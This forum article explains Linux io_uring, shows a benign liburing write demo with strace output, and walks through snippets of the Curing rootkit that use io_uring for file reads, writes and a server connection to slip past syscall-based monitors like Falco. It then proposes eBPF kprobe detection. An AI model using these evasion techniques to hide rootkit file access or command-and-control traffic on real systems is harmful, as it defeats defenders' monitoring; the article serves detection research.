Using io_uring to evade security detection, and how to detect it

Background

The ARMO research team recently disclosed a major blind spot in Linux runtime security tools: the io_uring interface lets rootkits bypass conventional monitoring schemes, and mainstream tools such as Falco and Tetragon fail to detect attacks that use this mechanism. The ARMO team has also open-sourced an io_uring-based rootkit, Curing: https://github.com/armosec/curing

About io_uring

As is well known, traditional blocking I/O through the read and write system calls carries a high performance overhead, so the Linux community proposed asynchronous I/O strategies such as thread pools and AIO. The basic principle of AIO is that the user submits I/O requests through io_submit() and then calls io_getevents() to check which events have completed. AIO has many problems, though, and Linus once commented on it (https://lwn.net/Articles/671657/):

AIO is a horrible ad-hoc design, with the main excuse being "other, less gifted people, made that design, and we are implementing it for compatibility because database people - who seldom have any shred of taste - actually use it". But AIO was always really really ugly. Now you introduce the notion of doing almost arbitrary system calls asynchronously in threads, but then you use that ass-backwards nasty interface to do so.

To replace AIO, the Linux community introduced a new (and notoriously vulnerability-prone) asynchronous I/O mechanism in kernel 5.1: io_uring. It performs asynchronous I/O through memory shared between kernel mode and user mode, with the following core structures:

  1. Submission Queue (SQ): Stores I/O requests initiated by user applications. It is a circular queue into which users place I/O request entries.
  2. Completion Queue (CQ): Stores the results of I/O processed by the kernel. It is also a circular queue: the kernel places results in it and user applications read them.
  3. Submission Queue Entries (SQEs): Hold the details of each I/O request. Users add them to the submission queue for the kernel to read.
  4. Completion Queue Entries (CQEs): Hold the result of each completed I/O request. The kernel adds them to the completion queue for the user application to read.

To put it in more everyday terms, take your father buying you oranges as an example:

  1. Traditional synchronous system call, such as write: You are at the train station and want an orange (user mode), but you have no money, so you have to ask your father to buy it (int 0x80 triggers the syscall). Your father goes off to buy the oranges (execution is now in kernel mode), and in the meantime all you can do is stand there and watch him.
  2. Asynchronous call with io_uring: You text your father asking him to buy oranges (write an SQE to the SQ) and get on with something else. Your father (the kernel) handles the texts in batches (consumes the SQ requests) and, once the purchase is made, sends a "done" text (a CQE) to the CQ. You can check your inbox (the CQ) whenever you like to see the result, with no need to wait around.

Put simply, compared with traditional system calls, io_uring provides a pair of shared ring buffers (SQ and CQ) for communication between the application and the kernel, which is rather similar to the way eBPF maps exchange data between kernel mode and user mode.
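The ring-buffer idea can be sketched with a toy model in plain C. This is not the kernel's actual memory layout: the struct and function names are hypothetical, the ring holds plain integers instead of SQEs or CQEs, and the memory barriers that a real shared ring needs are left out. It only shows how a producer advances the tail and a consumer advances the head over a power-of-two array.

```c
#include <stdbool.h>
#include <stdint.h>

#define RING_ENTRIES 4u                 /* must be a power of two */
#define RING_MASK    (RING_ENTRIES - 1u)

/* Hypothetical simplified ring: the producer owns tail, the consumer owns head. */
struct toy_ring {
    uint32_t head;                      /* next slot the consumer will read  */
    uint32_t tail;                      /* next slot the producer will write */
    uint64_t slots[RING_ENTRIES];       /* stand-in for SQEs or CQEs         */
};

/* Producer side: returns false when the ring is full. */
bool toy_ring_push(struct toy_ring *r, uint64_t value)
{
    if (r->tail - r->head == RING_ENTRIES)
        return false;
    r->slots[r->tail & RING_MASK] = value;
    r->tail++;                          /* publish the new entry */
    return true;
}

/* Consumer side: returns false when the ring is empty. */
bool toy_ring_pop(struct toy_ring *r, uint64_t *value)
{
    if (r->head == r->tail)
        return false;
    *value = r->slots[r->head & RING_MASK];
    r->head++;                          /* release the slot for reuse */
    return true;
}
```

In io_uring terms, the application plays the producer on the SQ and the consumer on the CQ, while the kernel plays the opposite roles.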

Key calls involved in io_uring

System calls

  • io_uring_setup
    • Creates an io_uring context:
int io_uring_setup(
u32 entries,                     // [in] number of queue entries
struct io_uring_params *params   // [in/out] configures the io_uring and returns the resulting SQ/CQ layout
);
  • io_uring_register
    • Registers files or user buffers for asynchronous I/O, so that they are set up once at registration rather than on every request:
int io_uring_register(
unsigned int fd,      // [in] file descriptor returned by io_uring_setup
unsigned int opcode,  // [in] registration type
void *arg,            // [in] pointer to the resources (e.g. address of a buffer array)
unsigned int nr_args  // [in] Number of resources (e.g., number of buffers)
);
  • io_uring_enter
    • Initiates and/or completes I/O: submits requests from the SQ to the kernel (to_submit) and/or blocks until at least min_complete completions are available in the CQ:
int io_uring_enter(
unsigned int fd,            // [in] file descriptor returned by io_uring_setup
unsigned int to_submit,     // [in] number of I/O requests to submit from the SQ
unsigned int min_complete,  // [in] minimum number of completions to wait for
unsigned int flags,         // [in] control flags (e.g. IORING_ENTER_GETEVENTS)
sigset_t *sig               // [in] optional signal mask
);
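As far as I know glibc does not ship wrappers for these three calls, which is why programs either use liburing or invoke them through syscall(2). The sketch below is a hypothetical helper, not code from Curing: it assumes a Linux build environment whose kernel headers provide <linux/io_uring.h> and __NR_io_uring_setup, and it only checks whether the running kernel lets the process create a ring at all.

```c
#define _GNU_SOURCE
#include <linux/io_uring.h>   /* struct io_uring_params */
#include <string.h>
#include <sys/syscall.h>      /* __NR_io_uring_setup */
#include <unistd.h>

/*
 * Returns 1 if an io_uring instance could be created, 0 if the kernel
 * refused (for example ENOSYS on old kernels, or EPERM when a seccomp
 * profile or system policy blocks io_uring).
 */
int io_uring_is_usable(void)
{
    struct io_uring_params params;
    memset(&params, 0, sizeof(params));   /* no special setup flags */

    long fd = syscall(__NR_io_uring_setup, 1u, &params);
    if (fd < 0)
        return 0;

    close((int)fd);                       /* the ring is just a file descriptor */
    return 1;
}
```

A defender can use the same check the other way round: if this returns 0 on a hardened host, the Curing technique has nothing to work with there.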

Some APIs of the user-space library liburing

  • io_uring_queue_init
    • Initialise an io_uring instance:
int io_uring_queue_init(
unsigned entries,        // [in] number of queue entries
struct io_uring *ring,   // [out] pointer to the io_uring instance to fill in
unsigned flags           // [in] initialisation flags (e.g. IORING_SETUP_IOPOLL)
);
  • io_uring_get_sqe
    • Get a free SQE:
struct io_uring_sqe *io_uring_get_sqe(
struct io_uring *ring    // [in] io_uring instance pointer
);
  • io_uring_prep_write
    • Configure write operation requests:
void io_uring_prep_write(
struct io_uring_sqe *sqe, // [in/out] SQE to be configured
int fd,                   // [in] object file descriptor
const void *buf,          // [in] Data buffer address
unsigned nbytes,          // [in] Number of bytes written
off_t offset              // [in] file write offset
);
  • io_uring_submit
    • Submit all queued requests to the kernel in one batch:
int io_uring_submit(
struct io_uring *ring     // [in] io_uring instance pointer
);
  • io_uring_wait_cqe
    • Wait for a completion; blocks until at least one CQE is available:
int io_uring_wait_cqe(
struct io_uring *ring,        // [in] io_uring instance pointer
struct io_uring_cqe **cqe_ptr // [out] The address of the completion event pointer
);

DEMO

#include <iostream>
#include <cstdio>    // perror
#include <cstring>
#include <fcntl.h>
#include <unistd.h>  // close
#include <liburing.h>

#define QUEUE_DEPTH 1

int main() {
    // 1. Open the target file
    int fd = open("test.txt", O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    // 2. Initialise the io_uring
    io_uring ring;
    int ret = io_uring_queue_init(QUEUE_DEPTH, &ring, 0);
    if (ret < 0) {
        std::cerr << "io_uring init failed: " << strerror(-ret) << std::endl;
        close(fd);
        return 1;
    }

    // 3. Prepare the data to be written
    const char* data = "Hello, io_uring!\n";
    size_t data_size = strlen(data);

    // 4. Get Submission Queue Entries (SQEs)
    io_uring_sqe* sqe = io_uring_get_sqe(&ring);
    if (!sqe) {
        std::cerr << "Failed to get SQE" << std::endl;
        io_uring_queue_exit(&ring);
        close(fd);
        return 1;
    }

    // 5. Set the write operation parameters
    io_uring_prep_write(sqe, fd, data, data_size, 0); // Write from file offset 0
    sqe->user_data = 1; // Optional user identification

    // 6. Submit the request to the kernel.
    ret = io_uring_submit(&ring);
    if (ret < 0) {
        std::cerr << "Submission failed: " << strerror(-ret) << std::endl;
        io_uring_queue_exit(&ring);
        close(fd);
        return 1;
    }

    // 7. Wait for the event to be completed.
    io_uring_cqe* cqe;
    ret = io_uring_wait_cqe(&ring, &cqe);
    if (ret < 0) {
        std::cerr << "Wait CQE failed: " << strerror(-ret) << std::endl;
        io_uring_queue_exit(&ring);
        close(fd);
        return 1;
    }

    // 8. Process the completion results
    if (cqe->res < 0) {
        std::cerr << "Write error: " << strerror(-cqe->res) << std::endl;
    } else {
        std::cout << "Wrote " << cqe->res << " bytes" << std::endl;
    }

    // 9. Mark CQE processed
    io_uring_cqe_seen(&ring, cqe);

    // 10. Clean up resources
    io_uring_queue_exit(&ring);
    close(fd);

    return 0;
}

strace results:

openat(AT_FDCWD, "test.txt", O_WRONLY|O_CREAT|O_TRUNC, 0644) = 3
io_uring_setup(1, {flags=0, sq_thread_cpu=0, sq_thread_idle=0, sq_entries=1, cq_entries=2, features=IORING_FEAT_SINGLE_MMAP|IORING_FEAT_NODROP|IORING_FEAT_SUBMIT_STABLE|IORING_FEAT_RW_CUR_POS|IORING_FEAT_CUR_PERSONALITY|IORING_FEAT_FAST_POLL|IORING_FEAT_POLL_32BITS|IORING_FEAT_SQPOLL_NONFIXED|IORING_FEAT_EXT_ARG|IORING_FEAT_NATIVE_WORKERS|IORING_FEAT_RSRC_TAGS, sq_off={head=0, tail=64, ring_mask=256, ring_entries=264, flags=276, dropped=272, array=384}, cq_off={head=128, tail=192, ring_mask=260, ring_entries=268, overflow=284, cqes=320, flags=280}}) = 4
mmap(NULL, 388, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE, 4, 0) = 0x7f5c8930e000
mmap(NULL, 64, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE, 4, 0x10000000) = 0x7f5c892d4000
io_uring_enter(4, 1, 0, 0, NULL, 8)     = 1
io_uring_enter(4, 0, 1, IORING_ENTER_GETEVENTS, NULL, 8) = 0

As you can see, although 17 bytes are written, the write system call is never triggered; the io_uring system calls take its place.
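The two mmap lengths in the trace (388 and 64) follow directly from the values that io_uring_setup returned. The sketch below reproduces that arithmetic. The function names are hypothetical, and the entry sizes (64-byte SQE, 16-byte CQE) assume the default layout without the larger-entry setup flags. The mmap offsets 0 and 0x10000000 correspond to IORING_OFF_SQ_RING and IORING_OFF_SQES.

```c
#include <stddef.h>
#include <stdint.h>

/* Entry sizes for the default layout (assumption: no SQE128/CQE32 flags). */
#define SQE_SIZE 64u   /* sizeof(struct io_uring_sqe) */
#define CQE_SIZE 16u   /* sizeof(struct io_uring_cqe) */

/* SQ ring mapping: header fields up to sq_off.array, then one u32 index per entry. */
size_t sq_ring_bytes(uint32_t sq_array_off, uint32_t sq_entries)
{
    return (size_t)sq_array_off + (size_t)sq_entries * sizeof(uint32_t);
}

/* CQ ring mapping: header fields up to cq_off.cqes, then the CQE array. */
size_t cq_ring_bytes(uint32_t cqes_off, uint32_t cq_entries)
{
    return (size_t)cqes_off + (size_t)cq_entries * CQE_SIZE;
}

/* With IORING_FEAT_SINGLE_MMAP both rings share one mapping of the larger size. */
size_t single_mmap_bytes(size_t sq_bytes, size_t cq_bytes)
{
    return sq_bytes > cq_bytes ? sq_bytes : cq_bytes;
}

/* The SQE array lives in its own mapping. */
size_t sqe_array_bytes(uint32_t sq_entries)
{
    return (size_t)sq_entries * SQE_SIZE;
}
```

Plugging in the traced values (sq_off.array=384, sq_entries=1, cq_off.cqes=320, cq_entries=2) gives 388 bytes for the SQ ring, 352 for the CQ ring, so 388 for the shared mapping, and 64 bytes for the SQE array, matching the two mmap calls.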

Curing: evading security product detection

Curing is a rootkit built on the https://github.com/Iceber/iouring-go project. Because io_uring only covers I/O operations, the backdoor cannot bypass traditional EDR when it comes to command execution; what it evades is detection of file reads, file writes and network connections.

Code snippet for reading a file:

flags := syscall.O_RDONLY
// Use io_uring's Openat method to create a request to open a file.
openReq, err := iouring.Openat(unix.AT_FDCWD, cmd.Path, uint32(flags), 0)
if err != nil {
    result.ReturnCode = 1
    result.Output = []byte("Failed to create open request: " + err.Error())
    return result
}
// Submit a request to open a file to the io_uring queue.
if _, err := e.ring.SubmitRequest(openReq, e.resultChan); err != nil {
    result.ReturnCode = 1
    result.Output = []byte("Failed to submit open request: " + err.Error())
    return result
}

Code snippet for writing the file:

flags := syscall.O_WRONLY | syscall.O_CREAT | syscall.O_TRUNC
mode := uint32(0644)
// Use io_uring's Openat method to create a request to open a file.
openReq, err := iouring.Openat(unix.AT_FDCWD, cmd.Path, uint32(flags), mode)
if err != nil {
    result.ReturnCode = 1
    result.Output = []byte("Failed to create open request: " + err.Error())
    return result
}
// Submit the open request (opened for writing) to the io_uring queue.
if _, err := e.ring.SubmitRequest(openReq, e.resultChan); err != nil {
    result.ReturnCode = 1
    result.Output = []byte("Failed to submit open request: " + err.Error())
    return result
}

Under the hood this is essentially the same as the file read/write implementation shown above. Next comes network communication (which is also where Curing claims to evade traditional EDR detection):

request, err := iouring.Connect(sockfd, &syscall.SockaddrInet4{
    Port: cp.cfg.Server.Port,
    Addr: func() [4]byte {
        var addr [4]byte
        copy(addr[:], net.ParseIP(cp.cfg.Server.Host).To4())
        return addr
    }(),
})

The underlying implementation is similar to file reads and writes, except that the data goes through a socket, for example:

if (registerfiles) {
    // Register socket descriptors to io_uring file tables.
    ret = io_uring_register_files(ring, &sockfd, 1);
    if (ret) {
        fprintf(stderr, "file reg failed\n"); // Registration failure handling
        goto err;
    }
    use_fd = 0; // Use the registered file descriptor index (0)
} else {
    use_fd = sockfd; // Use the original socket descriptor directly.
}

// Prepare an asynchronous receive request.
sqe = io_uring_get_sqe(ring); // Get a free SQE.
io_uring_prep_recv(sqe, use_fd, iov->iov_base, iov->iov_len, 0);
if (registerfiles)
    sqe->flags |= IOSQE_FIXED_FILE; // Mark fd as an index into the registered file table
sqe->user_data = 2; // User-defined tag, used to identify the result

// Submit a request to the ring buffer.
ret = io_uring_submit(ring);
if (ret <= 0) {
    fprintf(stderr, "submit failed: %d\n", ret);
    goto err;
}

In testing, with Falco configured to monitor the files and ports used by Curing, Falco did not react.

One complaint here: ARMO played a bit of a trick. The official Falco policy used for the bypass only monitors the connect system call, and in the bypass demo the only system call the network request needs to hide is connect, which looks like a question designed around its answer. That said, traditional detection schemes for file reads and writes really are completely ineffective against io_uring.

For example, if I hook Layer 4 directly (for instance with a kprobe on tcp_v4_connect), the network communication is in fact visible.

Targeted detection

Take the ltrace output of a demo provided with Curing:

io_uring_queue_init(1, 0x7ffddf399a20, 0, 0x5632021d8d68)                = 0
io_uring_submit(0x7ffddf399a20, 0x7736655d4000, 577, 0x5632021d703b)     = 1
__io_uring_get_cqe(0x7ffddf399a20, 0x7ffddf399a10, 0, 1)                 = 0
io_uring_submit(0x7ffddf399a20, 0x7736655d4000, 5, 0x5632021d7008)       = 1
printf("Successfully wrote %d bytes to s"..., 5Successfully wrote 5 bytes to shadow.pdf
)                         = 41
io_uring_submit(0x7ffddf399a20, 0x7736655d4000, 0, 0)                    = 1
io_uring_queue_exit(0x7ffddf399a20, 1, 3, 0)                             = 3
+++ exited (status 0) +++

Since most applications do not rely on io_uring, we can simply hook io_uring-related probe points. There is one pitfall: the ltrace output contains no io_uring_prep_write call, because io_uring_prep_write is a static inline function whose work is done by io_uring_prep_rw:

IOURINGINLINE void io_uring_prep_rw(int op, struct io_uring_sqe *sqe, int fd,
                                    const void *addr, unsigned len,
                                    __u64 offset)
{
        sqe->opcode = (__u8) op;
        sqe->flags = 0;
        sqe->ioprio = 0;
        sqe->fd = fd;
        sqe->off = offset;
        sqe->addr = (unsigned long) addr;
        sqe->len = len;
        sqe->rw_flags = 0;
        sqe->buf_index = 0;
        sqe->personality = 0;
        sqe->file_index = 0;
        sqe->addr3 = 0;
        sqe->__pad2[0] = 0;
}
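Because io_uring_prep_rw only fills in fields of the SQE, the operation being requested is identified by sqe->opcode rather than by a system call number. A detector that can inspect SQEs (how it obtains them is outside this sketch) could map the opcode back to the classic system call it replaces. The names below are hypothetical; the numeric values are my reading of the kernel's enum io_uring_op and should be checked against the installed <linux/io_uring.h>.

```c
#include <stdint.h>

/* Subset of enum io_uring_op values (assumption: verify against your headers). */
enum demo_io_uring_op {
    DEMO_OP_CONNECT = 16,
    DEMO_OP_OPENAT  = 18,
    DEMO_OP_READ    = 22,
    DEMO_OP_WRITE   = 23,
    DEMO_OP_SEND    = 26,
    DEMO_OP_RECV    = 27,
};

/* Name of the traditional syscall that a given SQE opcode stands in for. */
const char *sqe_opcode_to_syscall(uint8_t opcode)
{
    switch (opcode) {
    case DEMO_OP_CONNECT: return "connect";
    case DEMO_OP_OPENAT:  return "openat";
    case DEMO_OP_READ:    return "read";
    case DEMO_OP_WRITE:   return "write";
    case DEMO_OP_SEND:    return "send";
    case DEMO_OP_RECV:    return "recv";
    default:              return "other";
    }
}
```

These six opcodes cover the operations shown in this article: opening, reading and writing files, connecting, and sending or receiving on a socket.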

So we can monitor io_uring_setup with a kprobe:

int trace_io_uring_setup(struct pt_regs *ctx) {
    // Read the arguments from the registers.
    unsigned int entries = PT_REGS_PARM1(ctx);
    struct io_uring_params *params = (struct io_uring_params *)PT_REGS_PARM2(ctx);

    struct event_data event = {};
    event.pid = bpf_get_current_pid_tgid() >> 32;
    bpf_get_current_comm(&event.comm, sizeof(event.comm));

    event.entries = entries;

    if (params) {
        // params points into user space, so read it with the user-memory helper.
        bpf_probe_read_user(&event.flags, sizeof(event.flags), &params->flags);
        bpf_probe_read_user(&event.sq_thread_cpu, sizeof(event.sq_thread_cpu), &params->sq_thread_cpu);
        bpf_probe_read_user(&event.sq_thread_idle, sizeof(event.sq_thread_idle), &params->sq_thread_idle);
    }

    // Send the event to user space.
    events.perf_submit(ctx, &event, sizeof(event));
    return 0;
}

This BCC-based demo is fairly simple and displays some of the parameters.

Curing produces similar output (the system calls are the same, after all).

Summary

In short, Curing performs file reads, file writes and network communication through io_uring. Because these operations do not go through the traditional system calls, they bypass traditional kprobe-based detection (Microsoft Defender, Falco) built around write, read, connect and so on. Targeted detection means monitoring the io_uring-related system calls themselves; since io_uring is not widely used, partly because of its security track record, such calls stand out.
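The detection idea can be sketched as a small decision function. It assumes the monitor already has the syscall number and process name of each event (for instance from a probe like the one above). The function names and the allowlist are hypothetical, and the syscall numbers 425 to 427 are the values I know for x86_64 and the generic syscall table, so they should be checked on other architectures.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* io_uring syscall numbers (assumption: x86_64 / generic syscall table). */
#define NR_IO_URING_SETUP    425
#define NR_IO_URING_ENTER    426
#define NR_IO_URING_REGISTER 427

/* True if the syscall number is one of the three io_uring entry points. */
bool is_io_uring_syscall(long nr)
{
    return nr == NR_IO_URING_SETUP ||
           nr == NR_IO_URING_ENTER ||
           nr == NR_IO_URING_REGISTER;
}

/*
 * Alert when a process that is not on the allowlist touches io_uring.
 * comm is the process name; allowlist holds names expected to use io_uring.
 */
bool should_alert(const char *comm, long nr,
                  const char *const *allowlist, size_t allow_count)
{
    if (!is_io_uring_syscall(nr))
        return false;
    for (size_t i = 0; i < allow_count; i++) {
        if (strcmp(comm, allowlist[i]) == 0)
            return false;               /* known, expected io_uring user */
    }
    return true;
}
```

The allowlist keeps the rule quiet for the few programs on a host that legitimately use io_uring, which is what makes alerting on every other use practical.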

This article comes from the 52pojie Forum (XCarthGetlin).
